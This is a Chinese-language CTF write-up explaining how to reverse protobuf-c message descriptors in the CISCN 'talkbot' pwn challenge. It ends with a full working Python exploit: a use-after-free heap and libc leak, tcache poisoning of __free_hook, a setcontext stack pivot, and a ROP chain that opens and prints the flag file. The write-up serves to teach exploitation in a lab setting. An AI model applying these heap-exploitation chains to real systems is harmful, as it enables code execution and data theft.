pwn题中的protobuf逆向

以ciscn初赛的talkbot题为例，详解一下protobuf赛题的一个简单逆向过程。

（麻麻再也不用担心我看不懂protobuf了）

什么是protobuf

Protobuf (Protocol Buffers) 是谷歌开发的一款无关平台，无关语言，可扩展，轻量级高效的序列化结构的数据格式，用于将自定义数据结构序列化成字节流，和将字节流反序列化为数据结构。所以很适合做数据存储和为不同语言，不同应用之间互相通信的数据交换格式，只要实现相同的协议格式，即后缀为proto文件被编译成不同的语言版本，加入各自的项目中，这样不同的语言可以解析其它语言通过Protobuf序列化的数据。目前官方提供c++，java，go等语言支持。

protobuf的安装有很多教程，其中c语言支持需要额外的补丁。

protobuf安装好久了，学习是最近才学的，安装教程大家自己可以上网找一找。

protobuf 使用及其逆向

安装过程不再赘述，需要安装protobuf，以及其c语言支持protobuf-c，具体步骤我忘了。

c语言下proto的简单使用

首先需要创建一个.proto文件：

syntax = "proto2";

// Example message: three signed 64-bit integers and one raw byte blob.
// The numbers after '=' are the field tags used on the wire.
message devicemsg{
    required sint64 actionid = 1;    // sint64 (ZigZag-encoded varint), not plain int64
    required sint64 msgidx = 2;
    required sint64 msgsize = 3;
    required bytes msgcontent = 4;   // arbitrary bytes, length-delimited
}

这个文件描述了一个数据结构，学过c/c++的应该能看懂

一篇文章熟悉Python 开发Protobuf2(Google Protocol Buffers)

这篇文章有介绍proto的语法

之后执行如下命令：

protoc --c_out=. devicemsg.proto

其中，--c_out代表输出的是c语言的proto文件，可以换成--python_out，来便于后期编写python脚本。"=."意味着输出在当前目录下，后面devicemsg.proto是我们上面写的proto文件

之后会生成两个文件：devicemsg.pb-c.h，和devicemsg.pb-c.c

在生成的.c文件里我们会发现一些关键函数

/*
 * Deserialize `len` bytes starting at `data` into a Devicemsg.
 *
 * Thin generated wrapper: it forwards its three arguments to
 * protobuf_c_message_unpack() together with &devicemsg__descriptor and casts
 * the result to Devicemsg *. The descriptor argument is the interesting part
 * when reversing, because it describes the message's fields.
 */
Devicemsg *devicemsg__unpack (ProtobufCAllocator  *allocator, size_t len, const uint8_t *data)
{
  return (Devicemsg *)protobuf_c_message_unpack (&devicemsg__descriptor,
allocator, len, data);
}

/*
 * Serialize `message` into the caller-supplied buffer `out`.
 *
 * Asserts that the message really is a Devicemsg (its base.descriptor must be
 * &devicemsg__descriptor), then forwards to protobuf_c_message_pack() and
 * returns that function's size_t result.
 */
size_t devicemsg__pack(const Devicemsg *message, uint8_t *out)
{
  assert(message->base.descriptor == &devicemsg__descriptor);
  return protobuf_c_message_pack ((const ProtobufCMessage*)message, out);
}

pack用来打包（序列化）得到字节流，unpack用来解包（反序列化）得到有结构数据。以这道题为例，题目中就有一个unpack函数用于解包数据。

可以看到unpack函数本身只是一层简单的封装，它有三个参数：第一个为allocator，一般为0，用处不大；第二个为数据包长度；第三个是数据字节流，即我们传输的东西。之后它调用了库函数protobuf_c_message_unpack，其中devicemsg__descriptor就是一个用于描述先前定义的message结构的数据。而返回值是一个指针，指向解包得到的message结构体。

容易想到，我们可以通过分析devicemsg__descriptor，来还原message的结构。

关键结构逆向

devicemsg__descriptor为ProtobufCMessageDescriptor类型的一个结构。

/*
 * Describes one message type (here: devicemsg__descriptor).
 *
 * Reversing aid -- field offsets, assuming an LP64 target such as x86-64
 * (8-byte pointers and size_t, 4-byte unsigned, natural alignment):
 *   +0x00 magic           +0x08 name           +0x10 short_name
 *   +0x18 c_name          +0x20 package_name   +0x28 sizeof_message
 *   +0x30 n_fields        +0x38 fields         +0x40 fields_sorted_by_name
 *   +0x48 n_field_ranges  +0x50 field_ranges
 */
struct ProtobufCMessageDescriptor {
	/** Magic value checked to ensure that the API is used correctly. */
	uint32_t			magic;

	/** The qualified name (e.g., "namespace.Type"). */
	const char			*name;
	/** The unqualified name as given in the .proto file (e.g., "Type"). */
	const char			*short_name;
	/** Identifier used in generated C code. */
	const char			*c_name;
	/** The dot-separated namespace. */
	const char			*package_name;

	/**
	 * Size in bytes of the C structure representing an instance of this
	 * type of message.
	 */
	size_t				sizeof_message;

	/** Number of elements in `fields`. */
	unsigned			n_fields;
	/** Field descriptors, sorted by tag number. */
	const ProtobufCFieldDescriptor	*fields;
	/** Used for looking up fields by name. */
	const unsigned			*fields_sorted_by_name;

	/** Number of elements in `field_ranges`. */
	unsigned			n_field_ranges;
	/** Used for looking up fields by id. */
	const ProtobufCIntRange		*field_ranges;

	/** Message initialisation function. */
	ProtobufCMessageInit		message_init;

	/** Reserved for future use. */
	void				*reserved1;
	/** Reserved for future use. */
	void				*reserved2;
	/** Reserved for future use. */
	void				*reserved3;
};

我们关注以下几个结构就行了：

magic，一般为0x28AAEEF9
n_fields，关系到原始的message结构内有几条记录。
fields，这个指向message内所有记录类型组成的一个数组，可以借此逆向分析message结构。

重点是看fields，这个是ProtobufCFieldDescriptor类型的，我们看看这个结构长什么样子。

/*
 * Describes a single field of a message; `fields` in the message descriptor
 * points to an array of these.
 *
 * Reversing aid -- field offsets, assuming an LP64 target such as x86-64
 * (8-byte pointers, 4-byte unsigned/uint32_t, int-sized enums, natural
 * alignment):
 *   +0x00 name     +0x08 id                 +0x0c label
 *   +0x10 type     +0x14 quantifier_offset  +0x18 offset
 *   +0x20 descriptor  +0x28 default_value   +0x30 flags
 *   +0x34 reserved_flags  +0x38 reserved2   +0x40 reserved3
 * Under the same assumption each array element is 0x48 bytes.
 */
struct ProtobufCFieldDescriptor {
	/** Name of the field as given in the .proto file. */
	const char		*name;
	/** Tag value of the field as given in the .proto file. */
	uint32_t		id;
	/** Whether the field is `REQUIRED`, `OPTIONAL`, or `REPEATED`. */
	ProtobufCLabel		label;
	/** The type of the field. */
	ProtobufCType		type;
	/**
	 * The offset in bytes of the message's C structure's quantifier field
	 * (the `has_MEMBER` field for optional members or the `n_MEMBER` field
	 * for repeated members or the case enum for oneofs).
	 */
	unsigned		quantifier_offset;
	/**
	 * The offset in bytes into the message's C structure for the member
	 * itself.
	 */
	unsigned		offset;
	/**
	 * A type-specific descriptor.
	 *
	 * If `type` is `PROTOBUF_C_TYPE_ENUM`, then `descriptor` points to the
	 * corresponding `ProtobufCEnumDescriptor`.
	 *
	 * If `type` is `PROTOBUF_C_TYPE_MESSAGE`, then `descriptor` points to
	 * the corresponding `ProtobufCMessageDescriptor`.
	 *
	 * Otherwise this field is NULL.
	 */
	const void		*descriptor; /* for MESSAGE and ENUM types */
	/** The default value for this field, if defined. May be NULL. */
	const void		*default_value;
	/**
	 * A flag word. Zero or more of the bits defined in the
	 * `ProtobufCFieldFlag` enum may be set.
	 */
	uint32_t		flags;
	/** Reserved for future use. */
	unsigned		reserved_flags;
	/** Reserved for future use. */
	void			*reserved2;
	/** Reserved for future use. */
	void			*reserved3;
};

我们只需关注如下：

name，名字，变量名
id，序号，即.proto文件中为该字段指定的编号（tag），通常也对应其在message结构体中的顺序（位置）
label，前面标记的required等，这里是proto2的语法；proto3的字段没有这个标签，对应下面枚举中的PROTOBUF_C_LABEL_NONE
type，数据类型，string还是int64等
label和type都是枚举类型，占4个字节。具体数值与类型的对应关系，可以自己创一个文件现查,下面列出来枚举类型。

/*
 * Field label. No enumerator has an explicit value, so they are numbered
 * 0, 1, 2, 3 in declaration order; these are the raw integers seen in the
 * `label` member of a field descriptor in a binary.
 */
typedef enum {
	/** (= 0) A well-formed message must have exactly one of this field. */
	PROTOBUF_C_LABEL_REQUIRED,
	/**
	 * (= 1) A well-formed message can have zero or one of this field (but
	 * not more than one).
	 */
	PROTOBUF_C_LABEL_OPTIONAL,
	/**
	 * (= 2) This field can be repeated any number of times (including zero)
	 * in a well-formed message. The order of the repeated values will be
	 * preserved.
	 */
	PROTOBUF_C_LABEL_REPEATED,
	/**
	 * (= 3) This field has no label. This is valid only in proto3 and is
	 * equivalent to OPTIONAL but no "has" quantifier will be consulted.
	 */
	PROTOBUF_C_LABEL_NONE,
} ProtobufCLabel;

/*
 * Field type. No enumerator has an explicit value, so they are numbered from
 * 0 in declaration order; the number in each comment is the raw integer seen
 * in the `type` member of a field descriptor in a binary.
 */
typedef enum {
	PROTOBUF_C_TYPE_INT32,      /**< 0: int32 */
	PROTOBUF_C_TYPE_SINT32,     /**< 1: sint32 (signed int32) */
	PROTOBUF_C_TYPE_SFIXED32,   /**< 2: sfixed32, signed int32 (4 bytes) */
	PROTOBUF_C_TYPE_INT64,      /**< 3: int64 */
	PROTOBUF_C_TYPE_SINT64,     /**< 4: sint64 (signed int64) */
	PROTOBUF_C_TYPE_SFIXED64,   /**< 5: sfixed64, signed int64 (8 bytes) */
	PROTOBUF_C_TYPE_UINT32,     /**< 6: unsigned int32 */
	PROTOBUF_C_TYPE_FIXED32,    /**< 7: fixed32, unsigned int32 (4 bytes) */
	PROTOBUF_C_TYPE_UINT64,     /**< 8: unsigned int64 */
	PROTOBUF_C_TYPE_FIXED64,    /**< 9: fixed64, unsigned int64 (8 bytes) */
	PROTOBUF_C_TYPE_FLOAT,      /**< 10: float */
	PROTOBUF_C_TYPE_DOUBLE,     /**< 11: double */
	PROTOBUF_C_TYPE_BOOL,       /**< 12: boolean */
	PROTOBUF_C_TYPE_ENUM,       /**< 13: enumerated type */
	PROTOBUF_C_TYPE_STRING,     /**< 14: UTF-8 or ASCII string */
	PROTOBUF_C_TYPE_BYTES,      /**< 15: arbitrary byte sequence */
	PROTOBUF_C_TYPE_MESSAGE,    /**< 16: nested message */
} ProtobufCType;

继续分析

根据上述内容分析这道题，还原message，如下

syntax = "proto2";

// Message layout recovered from the challenge binary's devicemsg__descriptor.
message devicemsg{
    required sint64 actionid = 1;    // type value 4 (SINT64) in the descriptor, not 3 (INT64)
    required sint64 msgidx = 2;
    required sint64 msgsize = 3;
    required bytes msgcontent = 4;   // becomes a {len, data} pair in the C struct
}

(之前看见一个wp说前三项交互时要乘2，其实是类型他们弄错了，应该是sint64而非int64.这篇wp我列在了下面参考文献中)

但是这里要先解释一个问题，本题在解包后有一句：

func(*(v4 + 3), *(v4 + 4), *(v4 + 5), *(v4 + 6), *(v4 + 7));

v4是解包后返回的message的地址，这里有两个问题：

为什么是从+3开始？（v4为QWORD指针）
为什么从v4里面拉出来了五个参数？

上述还原的message，是用proto语法写的，并非是c语言的struct。实际上，在c中这个message长这个样子：

/*
 * C layout of the unpacked message. Viewed as an array of QWORDs on LP64:
 * [0..2] base, [3] actionid, [4] msgidx, [5] msgsize,
 * [6] msgcontent.len, [7] msgcontent.data.
 */
struct  Devicemsg
{
  ProtobufCMessage base;	/* common header: 24 bytes on LP64 (pointer + unsigned + padding + pointer), not 16 */
  int64_t actionid;
  int64_t msgidx;
  int64_t msgsize;
  ProtobufCBinaryData msgcontent;
};

/*
 * Header embedded at the start of every generated message struct.
 * Assuming LP64 with natural alignment: descriptor at +0x00,
 * n_unknown_fields at +0x08 (followed by 4 bytes of padding),
 * unknown_fields at +0x10; 0x18 bytes in total.
 */
struct ProtobufCMessage {
	/** The descriptor for this message type. */
	const ProtobufCMessageDescriptor	*descriptor;
	/** The number of elements in `unknown_fields`. */
	unsigned				n_unknown_fields;
	/** The fields that weren't recognized by the parser. */
	ProtobufCMessageUnknownField		*unknown_fields;
};

/*
 * C representation of a `bytes` field: a length plus a pointer.
 * Assuming LP64 this is two QWORDs (len at +0x00, data at +0x08), which is
 * why a decompiler without the type shows one `bytes` field as two values.
 */
struct ProtobufCBinaryData {
	size_t	len;        /**< Number of bytes in the `data` field. */
	uint8_t	*data;      /**< Data bytes. */
};

前24个字节给了base（64位下：8字节指针 + 4字节unsigned及4字节对齐填充 + 8字节指针），用来存放一些关键信息，所以后面的字段是从v4 + 3（QWORD下标3）开始的。

bytes类型，转化为c语言结构时会变成一个结构体，里面存放长度和内容指针。IDA由于没有内置相关结构信息，将其当做八字节数组进行解析，因此会产生一个有5个记录的错觉，实际上后两个参数是同一个记录内置的两条记录。

如何用python配合protobuf进行打包并解题？

生成相关模块

通过如下命令：

protoc --python_out=. devicemsg.proto

有的文章提到了通过pip install grpcio-tools安装这个东西去得到对应文件。注意这题不能用grpcio-tools，千万不要用下面这条语句来生成文件，我这边试了，不管用。

python -m grpc_tools.protoc -I ./ --python_out=./  personal.proto

以上指令解题时请不要使用，如有问题，请在评论区指正。

接下来生成devicemsg_pb2.py文件。

# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: devicemsg.proto
"""Generated protocol buffer code."""
from google.protobuf.internal import builder as _builder
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()


DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x0f\x64\x65vicemsg.proto\"R\n\tdevicemsg\x12\x10\n\x08\x61\x63tionid\x18\x01 \x02(\x12\x12\x0e\n\x06msgidx\x18\x02 \x02(\x12\x12\x0f\n\x07msgsize\x18\x03 \x02(\x12\x12\x12\n\nmsgcontent\x18\x04 \x02(\x0c')

_builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, globals())
_builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'devicemsg_pb2', globals())
if _descriptor._USE_C_DESCRIPTORS == False:

  DESCRIPTOR._options = None
  _DEVICEMSG._serialized_start=19
  _DEVICEMSG._serialized_end=101
# @@protoc_insertion_point(module_scope)

之后在exp中将其import进去，利用其中的devicemsg()函数（取决于定义的message的名字）创建类型，利用SerializeToString()函数生成字节流。

可以参考下面的exp，注意运行EXP时一定要用python3，否则生成的devicemsg_pb2.py里面会报错。

EXP

不会有人来打ciscn了看到这一题了还不会做这个简单的堆吧......

from pwn import *
import devicemsg_pb2


# Local copies of the challenge binary and of the libc it runs against.
ELFpath = '/home/wjc/Desktop/pwn'
libcpath = '/home/wjc/Desktop/libc-2.31.so'

# pwntools global settings: 64-bit target, verbose I/O logging, and a tmux
# split for any gdb window that gets attached.
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

# Target: a local process by default; swap in the remote line for the service.
p = process(ELFpath)
# p = remote('node4.buuoj.cn', 25965)

e = ELF(ELFpath)
libc = ELF(libcpath)


# Short aliases for the pwntools tube methods used throughout the exploit.
# Every alias acts on the module-level process/remote handle `p`.
ru=lambda s :p.recvuntil(s)
rut=lambda s,t :p.recvuntil(s,timeout=t)

r=lambda n :p.recv(n)
sal=lambda d,b:p.sendlineafter(d,b)
# Fixed: `sa` used to call sendlineafter, making it a duplicate of `sal`;
# it now sends the data without appending a newline.
sa=lambda d,b:p.sendafter(d,b)
sl=lambda s :p.sendline(s)
# `sls`/`ss` send the decimal text of a value; encode it so bytes reach the tube.
sls=lambda s :p.sendline(str(s).encode())
ss=lambda s :p.send(str(s).encode())
s=lambda s :p.send(s)
# Fixed: pad with a bytes fill character; bytes.ljust() raises TypeError when
# given a str on Python 3.
uu64=lambda data :u64(data.ljust(8,b'\x00'))
it=lambda :p.interactive()
b=lambda :gdb.attach(p)
bp=lambda bkp:gdb.attach(p,'b *'+str(bkp))

# Registry of named addresses collected while the exploit runs (name -> int).
LOGTOOL = dict()

def LOGALL():
    """Log every entry of LOGTOOL as a left-aligned name and its hex value."""
    log.success("**** all result ****")
    for label, value in LOGTOOL.items():
        log.success("%-20s%s" % (label + ":", hex(value)))

def get_base(a, text_name):
    """Return ``(text_addr, libc_base)`` looked up from ``a.libs()``.

    ``a.libs()`` must return a mapping of path -> load address. A path that
    contains ``text_name`` sets the first value; any other path containing
    ``"libc"`` sets the second. Later matches overwrite earlier ones, and a
    value with no match stays 0.
    """
    text_addr, libc_base = 0, 0
    for path, load_addr in a.libs().items():
        if text_name in path:
            text_addr = load_addr
            continue
        if "libc" in path:
            libc_base = load_addr
    return text_addr, libc_base

def debug():
    """Attach gdb to ``p`` with the load bases predefined and two breakpoints.

    The script sets the convenience variables ``$text_base`` and ``$libc_base``
    from ``get_base(p, 'pwn')`` and breaks at image offsets 0x1813 and 0x1542
    through ``$rebase`` (a command the attached gdb is expected to provide).
    """
    bases = get_base(p, 'pwn')
    # Written line by line so the whitespace gdb receives is explicit.
    template = (
        "\n"
        "    set $text_base = {}\n"
        "    set $libc_base = {} \n"
        "    b*$rebase(0x1813)\n"
        "    b*$rebase(0x1542)\n"
        "\n"
        "    "
    )
    gdb.attach(p, template.format(bases[0], bases[1]))


def sendmsg(content):
    """Wait for the service's input prompt, then send ``content`` as-is (no newline)."""
    prompt = 'You can try to have friendly communication with me now: '
    p.recvuntil(prompt)
    p.send(content)

def add(idx,size,content):
    """Send a serialized devicemsg with actionid 1 for slot ``idx``.

    ``size`` and ``content`` (bytes) fill msgsize and msgcontent.
    NOTE(review): actionid 1 is presumably the service's "create" operation,
    going by this function's name -- confirm against the binary.
    """
    request = devicemsg_pb2.devicemsg(
        actionid=1,
        msgidx=idx,
        msgsize=size,
        msgcontent=content,
    )
    sendmsg(request.SerializeToString())

def edit(idx,content):
    """Send a serialized devicemsg with actionid 2 for slot ``idx``.

    msgsize is always 0x50, whatever the length of ``content`` (bytes).
    NOTE(review): actionid 2 is presumably the service's "update" operation,
    going by this function's name -- confirm against the binary.
    """
    request = devicemsg_pb2.devicemsg(
        actionid=2,
        msgidx=idx,
        msgsize=0x50,
        msgcontent=content,
    )
    sendmsg(request.SerializeToString())

def show(idx):
    """Send a serialized devicemsg with actionid 3 for slot ``idx``.

    msgsize and msgcontent are fixed filler values because every field of the
    message is declared ``required``.
    NOTE(review): actionid 3 is presumably the service's "print" operation,
    going by this function's name -- confirm against the binary.
    """
    request = devicemsg_pb2.devicemsg(
        actionid=3,
        msgidx=idx,
        msgsize=0x40,
        msgcontent=b'./flag\x00\x00',
    )
    sendmsg(request.SerializeToString())

def dele(idx):
    """Send a serialized devicemsg with actionid 4 for slot ``idx``.

    msgsize and msgcontent are fixed filler values because every field of the
    message is declared ``required``.
    NOTE(review): actionid 4 is presumably the service's "free" operation,
    going by this function's name -- confirm against the binary.
    """
    request = devicemsg_pb2.devicemsg(
        actionid=4,
        msgidx=idx,
        msgsize=0x40,
        msgcontent=b'./flag\x00\x00',
    )
    sendmsg(request.SerializeToString())

# Stage 1 -- heap leak.
# Create two 0x90-byte entries, delete both, then show entry 1 after it has
# been deleted and parse the last 8 bytes received before a double NUL.
# NOTE(review): presumably the printed value is the freed chunk's tcache
# forward pointer (a use-after-free read), and 0x310 is that pointer's offset
# from the heap base for this binary -- confirm in a debugger.
add(0,0x90,b'aaaa')
add(1,0x90,b'aaaa')
dele(0)
dele(1)
show(1)

heapbase=u64(ru('\x00\x00')[-8:])-0x310
LOGTOOL['heapbase']=heapbase

# Stage 2 -- libc leak.
# Create entries 2..9 (entry 3 carries the string './flag' after 0x10 filler
# bytes), delete entries 3..9 (seven deletions) and then entry 2, and finally
# show the deleted entry 2.
# NOTE(review): presumably the seven deletions fill the tcache bin so that
# entry 2 lands in the unsorted bin and its forward pointer points into libc;
# 0x1ecbe0 would then be that pointer's offset in this libc-2.31 build --
# confirm against the libc in use.
add(2,0x90,b'aaaa')

add(3,0x90,(b'x'*0x10+b'./flag'))
add(4,0x90,b'aaaa')
add(5,0x90,b'aaaa')
add(6,0x90,b'aaaa')
add(7,0x90,b'aaaa')
add(8,0x90,b'aaaa')
add(9,0x90,b'aaaa')

for i in range(3,10):
    dele(i)
dele(2)
show(2)

# Take the 6 bytes ending at the first 0x7f byte as a little-endian pointer.
libcbase=u64(ru('\x7f')[-6:].ljust(8,b'\x00'))-0x1ecbe0
LOGTOOL['libcbase']=libcbase
free_hook=libcbase+libc.symbols['__free_hook']
LOGTOOL['free_hook']=free_hook

# Stage 3 -- redirect a future allocation and compute the addresses needed.
# Entry 9 was deleted earlier, so this writes into a deleted entry.
# NOTE(review): presumably this overwrites the freed chunk's tcache forward
# pointer so that a later allocation is served from __free_hook -- confirm.
edit(9,p64(free_hook))

# Gadget offsets are relative to the libc base and specific to this libc build.
#0x0000000000023b6a : pop rdi ; ret
pop_rdi_ret=libcbase+0x23b6a
#0x000000000002601f : pop rsi ; ret
pop_rsi_ret=libcbase+0x2601f
#0x0000000000142c92 : pop rdx ; ret
pop_rdx_ret=libcbase+0x142c92
# Pivot gadget: loads rdx from [rdi + 8], then calls through [rdx + 0x20].
#0x0000000000151990 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
magic_gadget=libcbase+0x151990

read_addr=libcbase+libc.symbols['read']
write_addr=libcbase+libc.symbols['write']
open_addr=libcbase+libc.symbols['open']
setcontext=libcbase+libc.symbols['setcontext']

# Heap addresses derived from the leaked heap base.
# NOTE(review): the offsets below are layout-specific. flag_str presumably
# points at the './flag' string stored in entry 3, rop_addr at the chunk later
# filled with `pay`, and heap_7 at the chunk later filled with the fake
# context; flag_addr is scratch space for the file contents -- verify each.
flag_addr=heapbase+0x2000
flag_str=heapbase+0x320
rop_addr=heapbase+0xba0+0x10
heap_7=heapbase+0x1230+0x10

# Stage 4 -- build the payloads, plant them, and trigger.
# ROP chain (after two zero QWORDs): read(3, flag_addr, 0x30) followed by
# write(1, flag_addr, 0x30).
# NOTE(review): fd 3 is presumably the descriptor returned by the open() call
# set up in the fake context below -- confirm no other descriptor is open.
pay =p64(0)*2
pay+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(flag_addr)+p64(pop_rdx_ret)+p64(0x30)+p64(read_addr)
pay+=p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(flag_addr)+p64(pop_rdx_ret)+p64(0x30)+p64(write_addr)

# Fake context. The 0x10-byte head stores heap_7+0x10 at offset 8, matching the
# pivot gadget's `mov rdx, [rdi + 8]`; setcontext+61 sits at offset 0x20 of the
# body, matching the gadget's `call [rdx + 0x20]`.
# NOTE(review): assuming glibc 2.31 on x86-64, setcontext+61 loads rdi from
# [rdx+0x68], rsi from [rdx+0x70], rsp from [rdx+0xA0] and pushes [rdx+0xA8]
# as the return address, which would make this open(flag_str, 0) returning
# into the ROP chain at rop_addr -- confirm against the libc disassembly.
fake_context_head =p64(0)+p64(heap_7+0x10)
fake_context =b'\x00'*0x20
fake_context+=p64(setcontext+61)
fake_context =fake_context.ljust(0x68,b'\x00')
fake_context+=p64(flag_str)
fake_context+=p64(0)
fake_context+=p64(0)
fake_context =fake_context.ljust(0xA0,b'\x00')
fake_context+=p64(rop_addr)
fake_context+=p64(open_addr)

fake_context=fake_context_head+fake_context

# Entry 10 holds the fake context; the ROP chain is written into entry 8.
add(10,0xf0,fake_context)
edit(8,pay)

# NOTE(review): presumably the second of these two allocations is served from
# __free_hook (redirected earlier), installing the pivot gadget as the hook.
add(11,0x90,b'aaa')
add(12,0x90,p64(magic_gadget))

LOGALL()
debug()

# Deleting entry 10 is the trigger: if the hook is installed, the gadget runs
# with rdi pointing at the fake context stored in entry 10.
dele(10)


it()